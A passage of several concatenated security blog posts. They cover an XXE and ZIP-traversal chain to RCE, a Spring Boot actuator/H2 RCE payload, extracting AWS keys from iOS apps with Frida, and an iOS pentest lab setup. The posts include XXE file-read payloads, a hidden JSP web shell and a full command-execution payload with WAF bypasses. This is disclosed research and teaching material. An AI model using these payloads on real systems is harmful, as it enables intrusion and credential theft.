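        target = os.path.realpath(os.path.join(dest, info.filename))
        # Reject any entry that would land outside the extraction directory.
        if not target.startswith(dest + os.sep):
            raise ValueError(f"blocked traversal entry: {info.filename}")
        yield info

with zipfile.ZipFile(buf) as zf:
    try:
        list(safe_members(zf, "/tmp/unzip-here"))
    except ValueError as e:
        print(e)
```

A vulnerable parser simply joins the entry name onto the destination without this check.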

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.

Discovering the XXE

Now that we have the theoretical foundations of the attack, let's move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if the uploaded package was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
<package>
    <title>My Awesome Package</title>
    <author>John Doe</author>
</package>

I would get the following confirmation screen:

Package Info 1

The first thing I did was test for XSS. One tip about injecting XSS via XML: XML doesn't support raw <htmltags> because these get interpreted as XML nodes, so you have to escape them in the XML as &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.
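The escaping rule can be illustrated with Python's stdlib helpers; this is just a sketch of the encode/decode round trip, independent of whatever XML library the target actually uses.

```python
from xml.sax.saxutils import escape, unescape

# A raw tag would be parsed as an XML node, so the payload must be
# entity-encoded in the manifest; the consumer decodes it back.
payload = '<img src=x onerror=alert(1)>'
encoded = escape(payload)
print(encoded)                       # &lt;img src=x onerror=alert(1)&gt;
print(unescape(encoded) == payload)  # True
```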

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE package [<!ENTITY xxe SYSTEM ''>]>
<package>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
</package>

I didn't get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This is a mistake because you should always test incrementally, starting with non-system external entities, working your way up to local files, and then remote files. This helps you eliminate various possibilities along the way. After all, a standard firewall rule would block outgoing web connections, causing a remote external entity to fail. However, this does not necessarily mean local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE package [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
<package>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
</package>

That's when I struck gold. The contents of /etc/hosts appeared in the confirmation page.

Package Info 2

Pivoting to RCE

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script to generate ZIP files with directory traversal payloads. I needed to figure out where I wanted to place my traversal payload in the local file system. Here, the XXE helped. Local external entities support not just files but also directories, so if I used an external entity like file:///nameofdirectory, instead of the contents of a file, it would list the contents of the directory.

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application – I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,*"%>
<%
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

I uploaded my package, browsed to the sitemap page and... nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of the page, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration

Configuration Meme

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk's warnings that Java is uniquely prone to mishandling XML and ZIP files. Due to a combination of unsafe defaults and a lack of default parsers, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling of XML and ZIP files occurs across all programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, which makes it easy to introduce vulnerabilities; a single mistake is enough, and the probability of one increases with every additional “black box” library.

One approach to reduce vulnerabilities in development is Spotify's “Golden Path“:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.


The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michael Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.

Let's begin with the final payload:

POST /actuator/env HTTP/1.1

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return;} throw new IllegalArgumentException(); }');CALL EXEC('curl');"}

The payload comprises three parts: the environment modification request to the /actuator/env endpoint, the CREATE ALIAS H2 SQL command, and of course the final OS command injection.

Act One: Exposed Actuators

Spring Boot Actuator creates several HTTP endpoints that allow a developer to easily monitor and manage an application. As Stepankin notes, “Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.” For this exploit, the /actuator/env endpoint must be exposed. Developers only need to add management.endpoints.web.exposure.include=env (or worse, management.endpoints.web.exposure.include=*) to their configuration file to expose it.

The /actuator/env endpoint includes the GET and POST methods to retrieve and set the application's environment variables. The POST request uses the following format:

POST /actuator/env HTTP/1.1

{"name":"<NAME OF VARIABLE>","value":"<VALUE OF VARIABLE>"}

You can explore the list of environment variables for the application, which provide data about the execution context and system. However, only a few of these variables can be leveraged to change the app at runtime, and even fewer can be used to achieve code execution. Fortunately, Spring Boot 2.x uses the HikariCP database connection pool by default, which introduces one such variable.

Act Two: H2 CREATE ALIAS Command

HikariCP helps applications communicate with databases. According to its documentation, it accepts a connectionTestQuery configuration, defined as “the query that will be executed just before a connection is given to you from the pool to validate that the connection to the database is still alive.” The matching Spring Boot environment variable is spring.datasource.hikari.connection-test-query. In short, whenever a new database connection is created, the value of spring.datasource.hikari.connection-test-query will first be executed as an SQL query. There are two ways to trigger a new database connection: restart the app with a request to POST /actuator/restart, or change the number of database connections and initialize them by making multiple requests to the application.
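The two-step flow can be sketched as a pair of HTTP requests. This is a hypothetical illustration: the TARGET URL is a placeholder, the SQL payload is abbreviated, and nothing is actually sent; `urllib.request.urlopen(req)` would fire each request against a real target.

```python
import json
import urllib.request

TARGET = "http://target.example:8080"  # placeholder target

def env_request(name, value):
    # Build the POST /actuator/env body that overwrites one environment property.
    body = json.dumps({"name": name, "value": value}).encode()
    return urllib.request.Request(
        f"{TARGET}/actuator/env",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

# Step 1: plant a malicious connection-test query (payload abbreviated).
plant = env_request(
    "spring.datasource.hikari.connection-test-query",
    "CREATE ALIAS EXEC AS ...;CALL EXEC('id');",
)
# Step 2: restart so the connection pool is rebuilt and the test query runs.
restart = urllib.request.Request(
    f"{TARGET}/actuator/restart", data=b"{}", method="POST"
)

print(plant.get_method(), plant.full_url)
print(restart.get_method(), restart.full_url)
```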

This is already pretty serious – you can run arbitrary SQL queries and drop the database if you want. However, let's escalate this further and look into the H2 Database Engine, one of the most popular Java development databases. Think of it as a Java-based SQLite, but extremely easy to integrate into Spring Boot. It only requires one dependency. As such, it's commonly used in Spring Boot development.

Matheus Bernardes highlighted an important SQL command included in H2: CREATE ALIAS. Similar to PostgreSQL's User-Defined Functions, you can define a Java function corresponding to the alias and subsequently call it in an SQL query like you would a function.

CREATE ALIAS GET_SYSTEM_PROPERTY FOR "java.lang.System.getProperty";
CALL GET_SYSTEM_PROPERTY('java.class.path');

Of course, you can use Java's Runtime.getRuntime().exec function, which allows you to execute OS commands directly.

Act Three: Command Injection against WAFs and Limited Execution Contexts

At this point, you might come up against common WAF filters especially with juicy strings like exec() and so on. However, one advantage of such a nested payload is that you can easily find bypasses using various string concatenation techniques. RIPStech's Johannes Moritz demonstrates this by breaking up the query using the CONCAT and HEXTORAW commands:

CREATE ALIAS EXEC AS CONCAT('void e(String cmd) throws ',
HEXTORAW('007b'),'java.lang.Runtime rt = java.lang.Runtime.getRuntime();rt.exec(cmd);',HEXTORAW('007d'));
CALL EXEC('whoami');

Another challenge is that you might be executing code in an extremely limited context. The application might be running in a Dockerized instance without internet access and with limited commands available; Alpine Linux, the most common Linux distribution in Docker, doesn't even have Bash. Additionally, the exec() function executes raw OS commands rather than in a shell, removing helpful tools like boolean comparisons, pipes, and redirections.

Here, it helps to zoom out a little and approach the payload in a holistic manner. Remember that the point of spring.datasource.hikari.connection-test-query is to validate whether the connection to the database is still alive. If the query fails, the application will believe that the database is not reachable and no longer return other database queries. An attacker can leverage this to get a blind RCE where instead of a command like curl, they run grep root /etc/passwd. This returns output (since /etc/passwd does include the root string) and thus the query succeeds. The application continues to function normally. If they run grep nonexistent /etc/passwd, the command returns no output, the Java code throws an error, and the query fails, causing the app to fail.

String shellexec(String cmd) throws {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());
    if (s.hasNext()) {
        return;  // OS command returned output: return it and the SQL query succeeds
    }
    throw new IllegalArgumentException(); // no output: throw and the SQL query fails
}

This is an interesting way to tie together the three components of the payload to still prove code execution within a limited context. Many thanks to Ian Bouchard for pointing out the possibilities for a blind RCE.

Hopefully, you don't have to deal with that and can get a simple curl pingback instead, like my example vulnerable Spring Boot application.

Burp Collaborator

Conclusion: Dangerous Development Defaults

By exposing the /actuator/env and /actuator/restart endpoints – pretty common in a development setting – a developer puts their application at risk of remote code execution. Of course, this wouldn't be a problem if the application were only run locally, but it's not a stretch to imagine a careless developer putting it on a public IP during prototyping.

A common theme running through this write-up and the associated write-ups is that developers can easily introduce severe vulnerabilities in their code without knowing it. Actuators and the H2 database are useful tools to speed up development and prototyping, but exposing them creates a remote code execution vulnerability by default.

#springboot #pentest #cybersecurity #h2 #java


Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs requires API keys, which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client side in the first place.

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.


Mattt Thompson shared three ways developers can (insecurely) store client secrets in their apps:

  1. Hard-code secrets in source code
  2. Store secrets in Info.plist
  3. Obfuscate secrets using code generation

For the first two methods, we can simply expose these secrets using static analysis and grepping through the decrypted app files as covered by Ivan Rodriguez. For obfuscated secrets, we can short-circuit the obfuscation and save ourselves hours of reverse-engineering through the magic of Frida's dynamic analysis. This was how I extracted AWS client and secret keys for a bug bounty program.

The following walkthrough assumes that you have set up your iOS testing environment according to my iOS app pentesting quickstart post.

Static Analysis

Static analysis begins with extracting your target .ipa file. Make sure that you have installed iproxy and frida-ios-dump.

  1. In one terminal, run iproxy 2222 22
  2. Open the target app on your iDevice
  3. In another terminal, run ./ <APP DISPLAY NAME OR BUNDLE IDENTIFIER>
  4. You should now have a <APPNAME>.ipa file in your current directory
  5. mv <APPNAME>.ipa <APPNAME>.zip
  6. unzip <APPNAME>.zip
  7. The files are now unzipped to a Payload folder; open it up and check that an <APPNAME>.app file has been created (<APPNAME> might differ between the .ipa and .app files)
  8. mkdir AppFiles
  9. mv Payload/<APPNAME>.app/* AppFiles/

At this point, you should see a bunch of files in the AppFiles directory. While the files obviously differ from app to app, here are a few key files to look into.

Info.plist and other *.plist files: Info.plist functions similarly to AndroidManifest.xml for Android apps. It contains app metadata and can point out weaknesses or new attack surfaces such as custom URL schemes. Of course, it can also contain stored credentials. You can use macOS' built-in plutil command to lay out the data nicely in JSON with plutil -p Info.plist.

Some plist files can be stored in binary rather than XML, which makes it harder to parse directly. Run plutil -convert xml1 Info.plist to convert them back to XML.
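The binary-vs-XML round trip can also be sketched with Python's stdlib plistlib, mirroring what `plutil -convert xml1` does on macOS. The dictionary contents here are illustrative.

```python
import plistlib

meta = {"CFBundleIdentifier": "com.example.app", "API_KEY": "not-a-real-key"}

# Serialize to the binary plist format, then convert back to grep-friendly XML.
binary = plistlib.dumps(meta, fmt=plistlib.FMT_BINARY)
print(binary[:8])  # binary plists start with the b'bplist00' magic

xml = plistlib.dumps(plistlib.loads(binary), fmt=plistlib.FMT_XML)
print(b"<plist" in xml)  # True
```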

Quick tip: while GoogleService-Info.plist exists on many apps and includes an extremely juicy-looking API_KEY value, this is not a sensitive credential. It needs to be paired with a custom token to have any impact. Not all API keys are created equal; some have proper access controls and can be exposed without risk. Check out keyhacks to quickly identify and validate sensitive API keys.

You also want to begin grepping and parsing through the various files; grep "API_KEY" -r * or similar is a quick and dirty solution.

At this point, you should also poke at interesting files that hint at vulnerable functionality. Check html files (maybe an internal URL scheme vulnerable to DOM XSS?), templates, and third-party frameworks that could have known vulnerabilities.

With luck, you might walk away with a straightforward credential exposure.

Dynamic Analysis

Most times, it won't be that straightforward. Nevertheless, there are clues that might point you towards obfuscated credentials.

In one bug bounty program, I noticed that the app I was testing uploaded profile pictures to an S3 bucket, but the request was hidden from interception and the credentials were not stored in plaintext in the app files. Nevertheless, given that the upload was occurring, it was a safe bet to assume that credentials were being exchanged.

At this point, I could dive into the binary with Ghidra and attempt to walk through the obfuscated code to decrypt the credentials, but there is a way to short-circuit this whole process.

Think of it this way: at the end of the day, no matter how much obfuscation is used, the credentials need to be sent in plaintext (for insecure implementations) to the server. For that to happen, a method needs to be invoked somewhere in the code using these credentials.

This is where Frida and Objection come in. You want to hook the method that makes that call and dump its arguments – which should hopefully be the credentials you are looking for.

First, you need to identify the method. Fire up Objection with objection --gadget <APPNAME> explore. Next, run ios hooking list classes to dump all available classes in the app. This is a huge list. Grep through the list and identify interesting classes. For example, I looked for the classes with AWS or Amazon in the name. As luck would have it, there was an AWSCredentials class, among other interesting class names.

Objection console

Next, you want to begin watching these classes. Run ios hooking watch class <CLASSNAME> in the Objection console for each class. Now, perform the action in the app where the potentially vulnerable credentials could be exposed. In this case, I performed the profile picture upload function in the app, which triggered the following response:

(agent) Watching method: - initKey:
(agent) Watching method: - initSDK:
(agent) Registering job gk6i5disc88. Type: watch-class-methods for: AWSCredentials
myApp on (iPhone: 13.1.2) [usb] # (agent) [gk6i5disc88] Called: [AWSS3Client initKey:] (Kind: instance) (Super: AWSClient)

Awesome. So it looks like Frida successfully hooked onto the AWSCredentials class which includes the initKey and initSDK methods. When I performed the profile picture upload, the initKey method was called.

Now, we want to dump the arguments passed into the initKey method. In Objection, run ios hooking watch method "-[AWSCredentials initKey:]" --dump-args. Note that the format here is "-[<CLASSNAME> <METHOD>:]". Once again, I performed the profile picture upload in the app.

(agent) [gk6i5disc88] Called: -[AWSCredentials initKey:] 1 argument(Kind: instance) (Super: NSObject)
(agent) [gk6i5disc88] Argument dump: [AWSCredentials initKey: <AWS CLIENT KEY>:<AWS SECRET KEY>]

Success! Using dynamic analysis, I exposed the AWS keys used by the application. Of course, this meant that the app was using an insecure communication protocol with S3 as there are credential-less ways of implementing S3 uploads.


Hunting for secrets in iOS apps is a low-effort, high-payoff task that can help ease you into pentesting an application. (Un)fortunately, secrets management remains a hard problem especially for less-experienced developers, and continues to crop up as a recurring vulnerability. It's easy to forget that credentials are still exposed even when compiled into an app binary.

#ios #pentest #cybersecurity #frida #aws

Updated April 19, 2020: – Install OpenSSH through Cydia (ramsexy) – Checkra1n now supports Linux (inhibitor181) – Use a USB Type-A cable instead of Type-C (c0rv4x)

Updated April 26, 2020: – Linux-specific instructions (inhibitor181)

Updated August 14, 2020: – Burp TLS v1.3 configuration


I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has Xcode's iOS Simulator, which mimics the software environment of an iPhone, not the hardware. As such, iOS app pentesting requires an actual iOS device.

Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. Portswigger's Burp Suite Mobile Assistant needs to be installed onto a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release of the checkra1n jailbreak, A5-A11 iPhones, iPads, and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up, and new tools are also being released.

As such, I'm writing a quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak and consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found on iOS apps using the tools installed here.



Let's start with the basics. You need an A5-A11 iDevice, preferably an iPhone. I used an iPhone 8. Thanks to checkra1n, you don't really have to worry about the iOS version; as of now, it supports the latest iOS 13.3. Other than macOS, checkra1n also supports Linux.


Warning: Jailbreaking your iDevice significantly weakens your security posture. You should not be doing this on your primary device. In fact, you should not use the jailbroken device for anything other than pentesting.

Please jailbreak your device with a USB-A cable as USB-C jailbreaks have caused issues.

Take note that checkra1n is a semi-tethered jailbreak; every time you restart the iPhone, the jailbreak is lost, so you have to do this again.

  1. Download the latest checkra1n jailbreak at
  2. Connect your iPhone to your macOS device and open checkra1n with Applications → Right click checkra1n → Open.
  3. Unlock your iPhone and click “Start” in checkra1n
  4. Follow the rest of the steps in checkra1n and restart as necessary


For Linux, follow the instructions here to install checkra1n before proceeding to open it and run the same steps to jailbreak your iPhone.

Congrats! You have a jailbroken iPhone. Let's get down to business.


This is super simple. On the jailbroken iPhone, open up the checkra1n app, then click “Cydia” in the “Install” section.

checkra1n app

Now you have Cydia and can install several packages that will help in your testing. More on that later.


While you can SSH into your iPhone over the wireless network, it's a lot faster and more reliable to do that over USB.

On your iPhone, go to the Cydia store and install the OpenSSH package. After installing, it should restart Springboard.

Back on your connected macOS device, run:

  1. brew install libusbmuxd (apt-get install libusbmuxd* for Linux)
  2. iproxy 2222 22 (iproxy 2222 44 for Linux)
  3. In another terminal, run ssh root@localhost -p 2222
  4. For the password, enter alpine
  5. You should now have an SSH session in your iPhone

One perk is that you can also transfer files to and from your iPhone over SFTP using a client like FileZilla. Just select the SFTP protocol, set your host to localhost and port to 2222.

FileZilla settings

Frida and Objection

It's time to install my two favorite mobile app testing tools, Frida and Objection. I won't go into detail about their usage here, just the setup. Frida has an iOS guide I will refer to.

  1. On your macOS device, run pip3 install frida-tools
  2. On your iPhone, open Cydia and add Frida’s repository by going to Sources → Edit → Add and enter
  3. Go to Search → Enter Frida → Install
  4. Back on your macOS device, run pip3 install objection
  5. Finally, run objection --gadget "" explore to check that everything is integrated properly

Proxy Traffic and Bypass Cert Pinning

Proxying traffic through Burp Suite is fairly standard; follow the steps outlined in Yogendra Jaiswal's post. Recently, Burp Suite added the option to disable TLSv1.3 in version 2020.4, which helps iOS trust your custom certificates.

  1. On Burp Suite, go to Proxy → Options → Proxy Listener → Add → Bind to port: 1337 → Bind to address: All interfaces (or select a Specific Address) → TLS Protocols → Use Custom Protocols → Uncheck TLSv1.3 → “OK”
  2. On your iPhone, Settings → Wi-Fi → Info → Configure Proxy → Manual → Set server and port to the ones from the previous step
  3. On your iPhone, go to http://burp → Click “CA Certificate” → Download profile → Settings → General → Profiles & Device Management → Portswigger CA → Install
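Before reconfiguring the iPhone's Wi-Fi, it can save time to confirm from the host that the listener accepts proxied requests. This helper is my own sketch, assuming the port 1337 listener from step 1:

```shell
#!/bin/sh
# Sketch: probe the Burp listener by sending one proxied request through it.
proxy_check() {
  host="${1:-127.0.0.1}"      # address the listener is bound to
  if curl -sk -m 5 -x "http://$host:1337" https://example.com -o /dev/null; then
    echo "proxy reachable"
  else
    echo "no listener on $host:1337"
  fi
}

proxy_check
```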

Now traffic should be proxied through Burp – except for apps that utilize certificate pinning. Fortunately, the SSL Kill Switch 2 certificate pinning bypass tool was recently updated to support iOS 13.

  1. Make sure you have the following packages installed in Cydia: wget, Debian Packager, Cydia Substrate, PreferenceLoader
  2. Go to the SSL Kill Switch 2 release page and copy the link to the latest .deb release
  3. SSH into your iPhone (see the iProxy section above) and run:
     wget <RELEASE URL FROM STEP 2>
     dpkg -i <DOWNLOADED PACKAGE NAME>
     killall -HUP SpringBoard
     rm <DOWNLOADED PACKAGE NAME>
  4. On your iPhone, go to Settings → SSL Kill Switch 2 (it should be at the bottom) → Disable Certificate Validation

SSL Kill Switch 2 settings

You should be good to go.
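The SSH one-liners from step 3 can also be wrapped in a small on-device script (my own sketch; pass the .deb release URL you copied in step 2):

```shell
#!/bin/sh
# Sketch: fetch, install, and clean up the SSL Kill Switch 2 .deb on-device.
deb_name() { basename "$1"; }   # derive the package filename from the URL

install_sslkillswitch() {
  url="$1"
  pkg="$(deb_name "$url")"
  wget "$url" &&
    dpkg -i "$pkg" &&
    killall -HUP SpringBoard &&   # reload SpringBoard so the tweak loads
    rm "$pkg"
}
```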

Bypass Jailbreak Detection

Jailbreak detection is annoying but solvable. Of all the packages that support iOS 13, I've found that the Liberty Lite Cydia module works the most consistently.

  1. On your iPhone, open Cydia and add module author Ryley Angus’ repository by going to Sources → Edit → Add and entering the repository URL
  2. Go to Search → Enter Liberty Lite → Install
  3. Once installed, go to Settings → Liberty → Block Jailbreak Detection → Enable for the app you want to bypass

Kill and re-open your app. If it's still not bypassed, you can try other modules.

Liberty Lite settings

Dump App Files

Unlike Android apk files, the app binaries inside iOS ipa files are encrypted, preventing easy access and analysis. Having installed iproxy and Frida, we can use frida-ios-dump to dump the decrypted app from memory at runtime.

  1. On your macOS device, git clone && cd frida-ios-dump
  2. sudo pip3 install -r requirements.txt --upgrade
  3. In another terminal, run iproxy 2222 22 if it's not already running
  4. To dump an app's files, run ./ <APP DISPLAY NAME OR BUNDLE IDENTIFIER>

Typically, I like to symlink the script so it's easily accessible from my PATH with ln -s <ABSOLUTE PATH TO> /usr/local/bin/dump-ipa. Now whenever I want to dump an app, I can run the dump-ipa command from anywhere.
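The symlink trick can be demonstrated end to end with a throwaway stub standing in for the real dump script (the stub below is not frida-ios-dump, just an illustration of the PATH mechanics, using a temp dir so no sudo is needed):

```shell
#!/bin/sh
# Demo of the symlink-into-PATH trick; the stub stands in for the dump script.
set -e
tooldir="$(mktemp -d)"
printf '#!/bin/sh\necho dumping "$1"\n' > "$tooldir/dump-stub.sh"
chmod +x "$tooldir/dump-stub.sh"
ln -s "$tooldir/dump-stub.sh" "$tooldir/dump-ipa"
PATH="$tooldir:$PATH"
dump-ipa MyApp    # → dumping MyApp
```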


Conclusion

With this quickstart guide, you now have the basic tools set up to begin iOS app pentesting: searching for secrets in app files, hooking classes, and of course testing the web API. Best of all, this works on modern iOS hardware and versions.

I hope this guide is helpful for those looking to set up their iOS testing labs. I will follow up with a writeup of several bugs I've found with these tools and point out typical issues to look out for.

#ios #pentest #cybersecurity #frida #jailbreak
